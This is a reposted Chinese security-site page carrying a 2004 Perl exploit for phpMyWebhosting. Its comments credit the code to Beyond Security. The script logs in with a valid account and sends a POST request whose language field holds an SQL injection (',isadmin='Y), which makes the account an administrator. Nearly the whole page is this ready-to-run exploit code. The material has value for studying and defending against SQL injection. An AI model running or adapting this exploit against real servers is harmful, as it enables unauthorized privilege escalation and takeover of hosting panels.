首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpMyWebhosting SQL Injection Exploit
来源:http://www.beyondsecurity.com 作者:Noam 发布时间:2004-08-18  

#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password
combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the
user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
{
print "You must run the script with the following syntax:\n";
print $0." hostname path username password\n";
exit(0);
}

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $Host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

$remote->autoflush(1);

my $http = "POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506
Firefox/0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content =
"PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while ()
{
print $_;
}
print "\n";

close $remote;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ollydbg Format String Bug Expl
·GV postscript viewer Local buf
·Lithtech engine (new protocol)
·IpSwitch IMail local passwd de
·Gore <= 1.49 Gamespy cd-key
·Opera Local File/Directory Det
·TipxD <= 1.1.1 local exploi
·Integrity Protection Driver lo
·wget directory traversal explo
·YaPiG 0.92b add_coment PHP Ins
·Linux kernel 2.4 and 2.6 IGMP
·PlaySMS version 0.7 and prior
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved